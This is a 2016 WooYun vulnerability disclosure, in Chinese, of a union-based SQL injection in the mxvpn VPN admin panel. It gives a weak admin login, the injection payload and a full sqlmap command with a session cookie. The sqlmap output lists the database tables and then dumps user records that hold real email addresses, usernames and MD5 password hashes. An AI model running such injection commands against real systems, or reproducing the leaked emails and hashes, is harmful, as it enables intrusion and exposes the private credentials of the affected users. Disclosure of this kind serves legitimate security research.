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漏洞标题:wiz笔记泄漏信息之imxvpn后台SQLunion注入/泄漏156W用户 邮箱 帐号 密码


漏洞作者: 我在不想理你

提交时间:2016-05-04 16:27

修复时间:2016-05-09 16:30

公开时间:2016-05-09 16:30





漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]


4人收藏 收藏



2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开







然后我登录    mxvpn1/123456





黄天不负,在这找到了一枚union注入 and 8=7 union select 1,2,3,4,5,6,7,8,9,10,11,12,13%23

sqlmap -u '' --prefix=')' --suffix='%23' -p 'qid' --union-col=13  --cookie='PHPSESSID=sgo3i0sejsv58va4lq362q8h55' --technique=U --threads 10 -D radius --tables --count
___ ___| |_____ ___ ___ {}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:58:23
[21:58:23] [INFO] resuming back-end DBMS 'mysql'
[21:58:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: qid (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns (custom)
Payload: m=radius&c=faq&a=showfaq&qid=-3805) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5a4e6a4865536f6b7a59766e6f4e487846654d4c70635650685a4469577964514269736e57496453,0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL#
[21:58:24] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5
[21:58:24] [INFO] fetching tables for database: 'radius'
[21:58:24] [INFO] the SQL query used returns 59 entries
[21:58:24] [INFO] starting 10 threads
Database: radius
[59 tables]
| _report |
| alipay_log |
| dmq_action |
| dmq_action_log |
| dmq_auth_group |
| dmq_auth_group_access |
| dmq_auth_rule |
| dmq_datas |
| dmq_datastype |
| dmq_members |
| dmq_modules |
| dmq_online_report |
| dmq_oreport_view |
| dmq_radius_case |
| dmq_radius_email_notice |
| dmq_radius_faq |
| dmq_radius_faq_data |
| dmq_radius_faq_post |
| dmq_radius_faq_type |
| dmq_rebate_apply |
| dmq_rebate_order |
| dmq_rebate_promotion |
| dmq_rebate_promotion_old |
| dmq_rebate_setting |
| dmq_rebate_user |
| mx_rm_coupon |
| mx_rm_goods |
| mx_rm_order |
| mx_rm_order_old |
| mx_rm_radacct |
| mx_rm_syslog |
| nas |
| pre_kaijuan_promotion |
| radacct |
| radacct1 |
| radcheck |
| radgroupcheck |
| radgroupreply |
| radpostauth |
| radreply |
| radusergroup |
| rm_actsrv |
| rm_allowedmanagers |
| rm_allowednases |
| rm_cards |
| rm_changesrv |
| rm_ias |
| rm_invoices |
| rm_managers |
| rm_radacct |
| rm_radacct1 |
| rm_services |
| rm_settings |
| rm_specperacnt |
| rm_specperbw |
| rm_syslog |
| rm_usergroups |
| rm_users |
| usercount |
[21:58:24] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[21:58:24] [WARNING] reflective value(s) found and filtering out
[21:58:50] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
Database: radius
| Table | Entries |
| radacct | 25086862 |
| radcheck | 3214421 |
| rm_users | 1559710 |
| mx_rm_syslog | 1294390 |
| rm_actsrv | 876733 |
| mx_rm_order | 232206 |
| dmq_rebate_promotion | 176086 |
| dmq_rebate_promotion_old | 141286 |
| mx_rm_order_old | 114727 |
| mx_rm_radacct | 38960 |
| dmq_action_log | 34498 |
| dmq_oreport_view | 27616 |
| dmq_rebate_order | 14232 |
| dmq_radius_case | 13897 |
| rm_changesrv | 6911 |
| dmq_online_report | 6447 |
| rm_allowednases | 3637 |
| pre_kaijuan_promotion | 3097 |
| dmq_radius_email_notice | 2685 |
| _report | 529 |
| rm_syslog | 376 |
| nas | 300 |
| rm_allowedmanagers | 222 |
| dmq_radius_faq_post | 102 |
| dmq_radius_faq | 89 |
| dmq_radius_faq_data | 89 |
| alipay_log | 82 |
| rm_services | 81 |
| dmq_auth_rule | 54 |
| mx_rm_goods | 11 |
| rm_managers | 10 |
| dmq_datas | 9 |
| dmq_auth_group_access | 6 |
| dmq_members | 6 |
| dmq_modules | 5 |
| mx_rm_coupon | 4 |
| rm_ias | 4 |
| dmq_auth_group | 3 |
| dmq_datastype | 3 |
| dmq_radius_faq_type | 3 |
| rm_invoices | 3 |
| dmq_action | 2 |
| dmq_rebate_apply | 2 |
| dmq_rebate_user | 2 |
| rm_usergroups | 2 |
| dmq_rebate_setting | 1 |
| rm_settings | 1 |

rm_users表里有156W个用户,泄漏信息包括邮箱 帐号 密码 QQ等相关信息



sql-shell> select * from rm_users limit 0,100
[22:01:54] [INFO] fetching SQL SELECT statement query output: 'select * from rm_users limit 0,100'
[22:01:54] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[22:01:54] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[22:01:54] [INFO] fetching current database
[22:01:54] [INFO] fetched tables' columns on database 'radius'
[22:01:54] [INFO] the query with expanded column name(s) is: SELECT acctype, address, cardfails, city, comblimit, comment, company, country, createdby, createdon, credits, custattr, dis_record, downlimit, email, email_status, enableuser, expiration, firstname, groupid, lastname, mac, maccm, mobile, owner, password, phone, qq, selfreg, srvid, state, staticip, taxid, uplimit, uptimelimit, usemacauth, username, usestaticip, verified, verifycode, verifyfails, verifymobile, verifysentnum, warningsent, zip FROM rm_users LIMIT 0,100
[22:01:54] [INFO] starting 10 threads
[22:01:55] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-20","0.00","","0","0","75848797@qq.com","0","1","2011-10-20 00:00:00","","0","","","","","","...
[22:01:55] [INFO] retrieved: "0","","0","","104857600","","","","","2011-10-17","0.00","","0","0","","0","1","2011-10-17 22:01:23","","1","","","","","","96e79218965eb72c92a549dd...
[22:01:55] [INFO] retrieved: "0","","0","","1205294497","","","","admin","2011-09-27","0.00","","0","0","","0","1","2011-09-27 00:00:00","","1","","","","","admin","81dc9bdb52d04...
[22:01:56] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-17","0.00","","0","0","farmer@sohu.com","0","1","2011-10-17 00:00:00","","0","","","","","","...
[22:01:56] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-19","0.00","","0","0","farmer@163.com","0","1","2011-10-19 00:00:00","","0","","","","","","9...
[22:01:56] [INFO] retrieved: "0","","0","","6184822347","","","","Self reg.","2011-10-20","0.00","","0","0","luocyun@gmail.com","1","1","2014-10-17 21:17:21","","0","","","","","...
[22:01:56] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-20","0.00","","0","0","netsdie@126.com","0","1","2011-10-20 00:00:00","","0","","","","","","...
[22:01:56] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-17","0.00","","0","0","fadfadf@163.com","0","1","2011-10-17 00:00:00","","0","","","","","","...
[22:01:57] [INFO] retrieved: "0","","0","","104906443","","","","Self reg.","2011-10-20","0.00","","0","0","244375056@qq.com","0","1","2011-10-20 00:00:00","","0","","","","","",...
[22:01:57] [INFO] retrieved: "0","","0","","944980088","","","","Self reg.","2011-10-20","0.00","","0","0","farmer@sina.com","0","1","2011-10-20 00:00:00","","1","","","","","adm...
[22:01:57] [INFO] retrieved: "0","","0","","5974233611","","","","Self reg.","2011-10-18","0.00","","0","0","243328796@qq.com","1","1","2015-06-07 09:36:42","","0","","","","",""...
[22:01:57] [INFO] retrieved: "0","","0","","105371179","","","","Self reg.","2011-10-21","0.00","","0","0","wulinhuo@gmail.com","0","1","2011-10-21 00:00:00","","0","","","","","...
[22:01:57] [INFO] retrieved: "0","","0","","104857600","1","","","Self reg.","2011-10-20","0.00","","0","0","514316975@qq.com","0","1","2011-10-22 00:00:00","","0","","","","",""...
[22:01:57] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","denghongterry@163.com","0","1","2011-10-21 00:00:00","","0","","","","...
[22:01:57] [INFO] retrieved: "0","","0","","104857600","","","","","2011-10-17","0.00","","0","0","","1","1","2011-10-17 00:00:00","","1","","","","","admin","d41d8cd98f00b204e98...
[22:01:58] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","591661698@qq.com","0","1","2011-10-21 00:00:00","","0","","","","","",...
[22:01:58] [INFO] retrieved: "0","","0","","7484160038","","","","Self reg.","2011-10-21","0.00","","0","0","852208320@qq.com","1","1","2014-05-28 00:00:00","","1","","","","","a...
[22:01:58] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","475792013@qq.com","0","1","2011-10-21 00:00:00","","0","","","","","",...
[22:01:58] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","yihua@sina.cn","0","1","2011-10-21 00:00:00","","0","","","","","","52...
[22:01:58] [INFO] retrieved: "0","","0","","2644108249","","","","Self reg.","2011-10-21","0.00","","0","0","kid_w@126.com","1","1","2016-05-22 14:02:22","","0","","","","","","5...
[22:01:58] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","jiguofei@msn.com","0","1","2011-10-21 00:00:00","","0","","","","","",...
[22:01:59] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","xcbbc@qq.com","1","1","2011-10-21 00:00:00","","0","","","","","","97d...
[22:01:59] [INFO] retrieved: "0","","0","","429972716","","","","Self reg.","2011-10-21","0.00","","0","0","lyooivan@gmail.com","1","1","2011-10-21 00:00:00","","0","","","","","...
[22:01:59] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","myfantasticdream@yeah.net","0","1","2011-10-21 00:00:00","","0","","",...
[22:01:59] [INFO] retrieved: "0","","0","","2429728176","","","","Self reg.","2011-10-21","0.00","","0","0","louisa.yin@163.com","0","1","2011-10-21 00:00:00","","1","","","","",...
[22:02:00] [INFO] retrieved: "0","","0","","594495537","","","","Self reg.","2011-10-21","0.00","","0","0","691208022@qq.com","1","1","2011-10-21 00:00:00","","0","","","","","",...
[22:02:00] [INFO] retrieved: "0","","0","","104857600","","","","","2011-10-21","0.00","","0","0","","1","1","2011-10-21 11:47:40","","1","","","","","","96e79218965eb72c92a549dd...
[22:02:00] [INFO] retrieved: "0","","0","","114200436","","","","Self reg.","2011-10-21","0.00","","0","0","yeming.luan@gmail.com","1","1","2011-10-21 00:00:00","","0","","","","...
[22:02:00] [INFO] retrieved: "0","","0","","113017995","","","","Self reg.","2011-10-21","0.00","","0","0","silentoy@qq.com","1","1","2011-10-21 00:00:00","","0","","","","","","...
[22:02:00] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","xiecongjie@126.com","0","1","2011-10-21 00:00:00","","0","","","","","...
[22:02:00] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","lkl110226106@163.com","0","1","2011-10-21 00:00:00","","0","","","",""...
[22:02:01] [INFO] retrieved: "0","","0","","1264156594","订单号2015122115423272 充值到mxvpn帐号充值错误了已转到用户帐号mklhd已开通 2015.12.24","","","","2011-10-21","0.00","","0","0","","0","1","2015...
[22:02:01] [INFO] retrieved: "0","","0","","104857600","","","","admin","2011-10-21","0.00","","0","0","","0","1","2011-10-21 00:00:00","","1","","","","","admin","97f974881b3726...
[22:02:01] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","1203057330@qq.com","0","1","2011-10-21 00:00:00","","0","","","","",""...
[22:02:01] [INFO] retrieved: "0","","0","","22347715722","","","","Self reg.","2011-10-21","0.00","","0","0","weizeyun@sohu.com","1","1","2011-10-21 00:00:00","","0","","","","",...
[22:02:01] [INFO] retrieved: "0","","0","","104857600","","","","","2011-10-21","0.00","","0","0","","0","1","2011-10-21 18:11:05","","1","","","","","","96e79218965eb72c92a549dd...
[22:02:01] [INFO] retrieved: "0","","0","","47835563242","","","","Self reg.","2011-10-21","0.00","","0","0","82397143@qq.com","0","0","2011-10-21 00:00:00","","0","","","","",""...
[22:02:02] [INFO] retrieved: "0","","0","","104857600","","","","","2011-10-21","0.00","","0","0","","0","1","2011-10-21 13:43:43","","1","","","","","","96e79218965eb72c92a549dd...
[22:02:02] [INFO] retrieved: "0","","0","","278411083","","","","Self reg.","2011-10-21","0.00","","0","0","pdsjz@qq.com","0","1","2011-10-21 00:00:00","","0","","","","","","7e1...
[22:02:02] [INFO] retrieved: "0","","0","","104857600","","","","","2011-10-21","0.00","","0","0","","0","1","2011-10-21 18:31:07","","1","","","","","","e10adc3949ba59abbe56e057...
[22:02:03] [INFO] retrieved: "0","","0","","104938234","","","","Self reg.","2011-10-21","0.00","","0","0","595779860@qq.com","1","1","2011-10-21 00:00:00","","0","","","","","",...
[22:02:03] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","tyu4676@qq.com","0","1","2011-10-21 00:00:00","","0","","","","","","0...
[22:02:03] [INFO] retrieved: "0","","0","","185603372548","2014.12.17 淘宝包月","","","Self reg.","2011-10-21","0.00","","0","0","wf5599@163.com","1","1","2016-05-27 03:25:54","","0"...
[22:02:03] [INFO] retrieved: "0","","0","","3669745664","","","","Self reg.","2011-10-21","0.00","","0","0","long2827333@163.com","1","1","2011-10-21 00:00:00","","0","","","",""...
[22:02:04] [INFO] retrieved: "0","","0","","323756142","","","","Self reg.","2011-10-21","0.00","","0","0","aihui1106@yahoo.com.cn","0","1","2011-10-21 00:00:00","","0","","","",...
[22:02:04] [INFO] retrieved: "0","","0","","3650156283","","","","Self reg.","2011-10-21","0.00","","0","0","chinago@vip.qq.com","0","1","2011-10-21 00:00:00","","0","","","","",...
[22:02:04] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","cjy19890309@hotmail.com","0","1","2011-10-21 00:00:00","","0","","",""...
[22:02:04] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","jyasnnsy@hotmail.com","0","1","2011-10-21 00:00:00","","0","","","",""...
[22:02:04] [INFO] retrieved: "0","","0","","1122200827","","","","Self reg.","2011-10-21","0.00","","0","0","345865759@163.com","1","1","2011-10-21 00:00:00","","0","","","","","...
[22:02:04] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","xiaohuli45@qq.com","0","1","2011-10-21 00:00:00","","0","","","","",""...
[22:02:04] [INFO] retrieved: "0","","0","","6465661042","","","","Self reg.","2011-10-21","0.00","","0","0","jjh_4867@163.com","0","1","2011-10-21 00:00:00","","0","","","","",""...
[22:02:04] [INFO] retrieved: "0","","0","","7879189178","","","","Self reg.","2011-10-21","0.00","","0","0","im.9@qq.com","1","1","2011-10-21 00:00:00","","0","","","","","","0cf...
[22:02:05] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","675835840@qq.com","0","1","2011-10-21 00:00:00","","0","","","","","",...
[22:02:05] [INFO] retrieved: "0","","0","","163653888","","","","Self reg.","2011-10-21","0.00","","0","0","605714481@qq.com","0","1","2011-10-21 00:00:00","","0","","","","","",...
[22:02:05] [INFO] retrieved: "0","","0","","5194642325","","","","Self reg.","2011-10-21","0.00","","0","0","qian2nd@gmail.com","1","1","2011-10-21 00:00:00","","0","","","","","...
[22:02:05] [INFO] retrieved: "0","","0","","886801857","","","","Self reg.","2011-10-21","0.00","","0","0","ip976480226@sina.com","0","1","2011-10-21 00:00:00","","0","","","",""...
[22:02:06] [INFO] retrieved: "0","","0","","982050770","","","","Self reg.","2011-10-21","0.00","","0","0","lshf512@gmail.com","0","1","2011-10-21 00:00:00","","0","","","","",""...
[22:02:06] [INFO] retrieved: "0","","0","","1687180891","","","","Self reg.","2011-10-21","0.00","","0","0","cef272683@126.com","1","1","2011-10-21 00:00:00","","0","","","","","...
[22:02:06] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2016-02-25","0.00","","0","0","hash11@qq.com","1","1","2016-02-25 23:27:30","","0","","","","","","60...
[22:02:06] [INFO] retrieved: "0","","0","","7288916535","","","","Self reg.","2011-12-09","0.00","","0","0","23576873@qq.com","1","1","2011-12-09 00:00:00","","0","","","","","",...
[22:02:06] [INFO] retrieved: "0","","0","","901407847","","","","Self reg.","2011-10-21","0.00","","0","0","xfjd3656@sina.com","0","1","2011-10-21 00:00:00","","0","","","","",""...
[22:02:07] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","caizhenghai@gmail.com","0","1","2011-10-21 00:00:00","","0","","","","...
[22:02:07] [INFO] retrieved: "0","","0","","52689846022","","","","Self reg.","2011-10-21","0.00","","0","0","fiost@hotmail.com","0","0","2011-10-21 00:00:00","","1","","","","",...
[22:02:07] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","jesept@163.com","0","1","2011-10-21 00:00:00","","0","","","","","","4...
[22:02:07] [INFO] retrieved: "0","","0","","142082660","","","","Self reg.","2011-10-21","0.00","","0","0","mmsix@163.com","0","1","2011-10-21 00:00:00","","0","","","","","","4f...
[22:02:07] [INFO] retrieved: "0","","0","","23879747377","","","","Self reg.","2011-10-21","0.00","","0","0","huangyikun@gmail.com","0","1","2014-12-15 08:22:48","","0","","","",...
[22:02:08] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","dmxy0716@126.com","0","1","2011-10-21 00:00:00","","0","","","","","",...
[22:02:08] [INFO] retrieved: "0","","0","","43824162699","","","","Self reg.","2011-10-21","0.00","","0","0","suidea@rediffmail.com","0","0","2011-10-21 00:00:00","","1","","",""...
[22:02:08] [INFO] retrieved: "0","","0","","245991307","","","","Self reg.","2011-10-21","0.00","","0","0","99711004@qq.com","0","1","2011-10-21 00:00:00","","0","","","","","","...
[22:02:08] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","maggie.c1014@163.com","0","1","2011-10-21 00:00:00","","0","","","",""...
[22:02:08] [INFO] retrieved: "0","","0","","127709982484","","","","Self reg.","2011-10-21","0.00","","0","0","fushong37@sina.com","0","0","2011-10-21 00:00:00","","1","","","","...
[22:02:08] [INFO] retrieved: "0","","0","","104892260","","","","Self reg.","2011-10-21","0.00","","0","0","liqingyi@live.cn","0","1","2011-10-21 00:00:00","","0","","","","","",...
[22:02:09] [INFO] retrieved: "0","","0","","4284839903","","","","Self reg.","2011-10-21","0.00","","0","0","weeew_2@yahoo.com.cn","1","1","2011-10-21 00:00:00","","0","","","","...
[22:02:09] [INFO] retrieved: "0","","0","","111777160","","","","Self reg.","2011-10-21","0.00","","0","0","tttgov@163.com","0","1","2011-10-21 00:00:00","","0","","","","","","e...
[22:02:09] [INFO] retrieved: "0","","0","","1976248454","","","","Self reg.","2011-10-21","0.00","","0","0","304459523@qq.com","1","1","2011-10-21 00:00:00","","0","","","","",""...
[22:02:09] [INFO] retrieved: "0","","0","","104857600","","","","","2011-10-21","0.00","","0","0","","0","1","2011-10-21 21:39:13","","1","","","","","","96e79218965eb72c92a549dd...
[22:02:09] [INFO] retrieved: "0","","0","","10824459484","","","","Self reg.","2011-10-21","0.00","","0","0","christliuwei@gmail.com","1","1","2011-10-21 00:00:00","","0","","","...
[22:02:10] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","jzdtg2011@yahoo.com","0","1","2011-10-21 00:00:00","","0","","","","",...
[22:02:10] [INFO] retrieved: "0","","0","","1828099494","","","","Self reg.","2011-10-21","0.00","","0","0","wuoaidianpang23@gmail.com","0","1","2011-10-21 00:00:00","","0","",""...
[22:02:10] [INFO] retrieved: "0","","0","","36857578260","","","","Self reg.","2011-10-21","0.00","","0","0","jk00900@yahoo.com.cn","0","1","2011-10-21 00:00:00","","0","","","",...
[22:02:10] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","313537298@qq.com","0","1","2011-10-21 00:00:00","","0","","","","","",...
[22:02:10] [INFO] retrieved: "0","","0","","3757675570","","","","Self reg.","2011-10-21","0.00","","0","0","xtl2000@126.com","1","1","2011-10-21 00:00:00","","0","","","","","",...
[22:02:10] [INFO] retrieved: "0","","0","","162234419","","","","Self reg.","2011-10-21","0.00","","0","0","robinhood5@qq.com","0","1","2011-10-21 00:00:00","","0","","","","",""...
[22:02:11] [INFO] retrieved: "0","","0","","110447053","","","","Self reg.","2011-10-21","0.00","","0","0","1000069@163.com","0","1","2011-10-21 00:00:00","","0","","","","","","...
[22:02:11] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","gyckr@163.com","0","1","2011-10-21 00:00:00","","0","","","","","","be...
[22:02:11] [INFO] retrieved: "0","","0","","319467653","","","","Self reg.","2011-10-21","0.00","","0","0","dingdang117@hotmail.com","0","1","2011-10-21 00:00:00","","0","","",""...
[22:02:11] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","longlystranger@gmail.com","0","1","2011-10-21 00:00:00","","0","","","...
[22:02:12] [INFO] retrieved: "0","","0","","799790076","","","","Self reg.","2011-10-21","0.00","","0","0","ziboy@yeah.net","0","1","2011-10-21 00:00:00","","0","","","","","","f...
[22:02:12] [INFO] retrieved: "0","","0","","5312905982","","","","Self reg.","2011-10-21","0.00","","0","0","hibem@qq.com","1","1","2011-10-21 00:00:00","","0","","","","","","1e...
[22:02:12] [INFO] retrieved: "0","","0","","104857600","","","","Self reg.","2011-10-21","0.00","","0","0","magic1000@yeah.net","0","1","2011-10-21 00:00:00","","0","","","","","...
select * from rm_users limit 0,100 [100]:
[*] 0, West road 1343., 0, Tampa, 963641344, , R&C company, , admin, 2010-02-15, 0.39, , 0, 1068498944, user@myisp.com, 0, 1, 2014-04-22 00:00:00, John, 1, Smith, 11:22:33:44:55:66, , , admin, b59c67bf196a4758191e42f76670ceba, 158182817, , 0, 0, California, , , 858783744, 0, 0, user, 0, 1, , 0, , 0, 0, 32434
[*] 0, , 0, , 104857600, , , , admin, 2011-08-31, 0.00, , 0, 0, , 1, 0, 2011-08-31 00:00:00, , 1, , , , , admin, 97f974881b3726d9a77014b5f3b4d795, , , 0, 0, , , , 0, 0, 0, farmer, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 105356036, , , , 自助注册.\r, 2011-08-31, 0.00, , 0, 0, , 0, 1, 2011-09-08 00:00:00, , 1, , , , , admin, 97f974881b3726d9a77014b5f3b4d795, , , 1, 0, , , , 0, 2144667882, 0, inwome, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 10369142272, , , , admin, 2011-09-07, 0.00, , 0, 0, , 0, 0, 2011-09-07 00:00:00, , 1, , , , , admin, 9449405357742e8f234f12148c934ca0, , , 0, 0, , , , 0, 0, 0, inwome2, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 117512641, , , , admin, 2011-09-07, 0.00, , 0, 0, , 0, 1, 2011-09-07 00:00:00, , 1, , , , , admin, 9449405357742e8f234f12148c934ca0, , , 0, 0, , , , 0, 0, 0, inwome3, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 203950044, , , , Self reg., 2011-09-08, 0.00, , 0, 0, , 0, 1, 2011-09-08 00:00:00, , 0, , , , , , e8f2fbb6ab876469d71fd6411f25e0fc, , , 1, 0, , , , 0, 0, 0, zhangzhe, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 39665040777, , , , Self reg., 2011-09-08, 0.00, , 0, 0, , 1, 1, 2018-11-05 00:00:00, , 1, , , , , admin, 4297f44b13955235245b2497399d7a93, , , 1, 36, , , , 0, 0, 0, zz5252, 0, 1, , 0, , 0, 0,
[*] 0, DH, 0, DH, 5619315178, , , 中国, Self reg., 2011-09-08, 0.00, , 0, 0, 123@123.com, 1, 1, 2021-09-08 00:00:00, D, 1, H, , , 495427436785, admin, 0ce91c9c656f02cbf88be4d488f35c42, 496548156875, , 1, 27, 安徽, , , 0, 0, 0, playcs0000, 0, 1, , 0, , 0, 0, 232000
[*] 0, , 0, , 104857600, , , , 自助注册.\r, 2011-09-08, 0.00, , 0, 0, , 0, 1, 2011-09-08 00:00:00, , 0, , , , , , 0ce91c9c656f02cbf88be4d488f35c42, , , 1, 0, , , , 0, 0, 0, playcs0001, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104868881, , , , Self reg., 2011-09-20, 0.00, , 0, 0, , 0, 1, 2011-09-20 00:00:00, , 0, , , , , , e10adc3949ba59abbe56e057f20f883e, , , 1, 0, , , , 0, 0, 0, aaaa, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 1205294497, , , , admin, 2011-09-27, 0.00, , 0, 0, , 0, 1, 2011-09-27 00:00:00, , 1, , , , , admin, 81dc9bdb52d04dc20036dbd8313ed055, , , 0, 0, , , , 0, 0, 0, 1234, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-20, 0.00, , 0, 0, 75848797@qq.com, 0, 1, 2011-10-20 00:00:00, , 0, , , , , , 8a2e322ec9a5bde67d090d11c11688ba, , , 1, 0, , , , 0, 0, 0, blackname, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 6184822347, , , , Self reg., 2011-10-20, 0.00, , 0, 0, luocyun@gmail.com, 1, 1, 2014-10-17 21:17:21, , 0, , , , , , cc19aa05526be564d3dce61f9ddd3182, , , 1, 0, , , , 0, 0, 0, luocyun, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , , 2011-10-17, 0.00, , 0, 0, , 1, 1, 2011-10-17 00:00:00, , 1, , , , , admin, d41d8cd98f00b204e9800998ecf8427e, , , 0, 0, , , , 0, 0, 0, tj646, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , , 2011-10-17, 0.00, , 0, 0, , 0, 1, 2011-10-17 22:01:23, , 1, , , , , , 96e79218965eb72c92a549dd5a330112, , , 0, 0, , , , 0, 0, 0, test111, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-17, 0.00, , 0, 0, fadfadf@163.com, 0, 1, 2011-10-17 00:00:00, , 0, , , , , , 97f974881b3726d9a77014b5f3b4d795, , , 1, 0, , , , 0, 0, 0, test222, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-17, 0.00, , 0, 0, farmer@sohu.com, 0, 1, 2011-10-17 00:00:00, , 0, , , , , , 97f974881b3726d9a77014b5f3b4d795, , , 1, 0, , , , 0, 0, 0, test333, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 5974233611, , , , Self reg., 2011-10-18, 0.00, , 0, 0, 243328796@qq.com, 1, 1, 2015-06-07 09:36:42, , 0, , , , , , 8aeb0f8b35484a2a84b992b8b9791572, , , 1, 0, , , , 0, 0, 0, jerome, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-19, 0.00, , 0, 0, farmer@163.com, 0, 1, 2011-10-19 00:00:00, , 0, , , , , , 97f974881b3726d9a77014b5f3b4d795, , , 1, 0, , , , 0, 0, 0, test444, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-20, 0.00, , 0, 0, netsdie@126.com, 0, 1, 2011-10-20 00:00:00, , 0, , , , , , e10adc3949ba59abbe56e057f20f883e, , , 1, 0, , , , 0, 0, 0, netsdie, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 944980088, , , , Self reg., 2011-10-20, 0.00, , 0, 0, farmer@sina.com, 0, 1, 2011-10-20 00:00:00, , 1, , , , , admin, e10adc3949ba59abbe56e057f20f883e, , , 1, 0, , , , 0, 0, 0, test555, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, 1, , , Self reg., 2011-10-20, 0.00, , 0, 0, 514316975@qq.com, 0, 1, 2011-10-22 00:00:00, , 0, , , , , , 914ce5d379c06ec20f2dab4f2872b016, , , 1, 0, , , , 0, 0, 0, wocao852, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104906443, , , , Self reg., 2011-10-20, 0.00, , 0, 0, 244375056@qq.com, 0, 1, 2011-10-20 00:00:00, , 0, , , , , , 8a2e322ec9a5bde67d090d11c11688ba, , , 1, 0, , , , 0, 0, 0, blackname1, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 7288916535, , , , Self reg., 2011-12-09, 0.00, , 0, 0, 23576873@qq.com, 1, 1, 2011-12-09 00:00:00, , 0, , , , , , 236c46561a2ac961891e883dd6e69779, , , 1, 0, , , , 0, 0, 0, wesley841026, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 105371179, , , , Self reg., 2011-10-21, 0.00, , 0, 0, wulinhuo@gmail.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 21218cca77804d2ba1922c33e0151105, , , 1, 0, , , , 0, 0, 0, cn982114, 0, 1, , 0, , 0, 0,
[*] 0, , 0, , 104857600, , , , Self reg., 2011-10-21, 0.00, , 0, 0, denghongterry@163.com, 0, 1, 2011-10-21 00:00:00, , 0, , , , , , 171e4a6efd2c62377c1211105a0800a0, , , 1, 0, , , , 0, 0, 0, denghongterry, 0, 1, , 0, , 0, 0,
